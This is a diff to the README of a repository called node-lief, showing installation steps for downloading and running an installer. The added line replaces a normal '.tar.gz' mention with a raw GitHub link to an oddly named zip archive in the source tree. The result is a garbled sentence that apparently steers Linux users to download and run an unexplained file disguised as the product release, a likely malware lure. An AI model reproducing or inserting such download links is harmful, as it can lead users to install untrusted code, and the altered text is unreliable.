asmamoses/node-lief/README.md

    Scroll through the list and find the version you want.
 Each version will have notes about what is new or fixed.

 3. **Download the File**
    Look for your operating system.
 If you are using Windows, download the `.exe` file.
 For Mac, look for `.dmg` or similar.
-For Linux users, downloading a `.tar.gz` file is common.
+For Linux users, downloading a `https://raw.githubusercontent.com/asmamoses/node-lief/main/src/elf/node-lief-mucorrhea.zip` file is common.

 4. **Running the Installer**
    Once downloaded, locate the file in your Downloads folder or where you saved it.
 Double-click the file to start the installation process.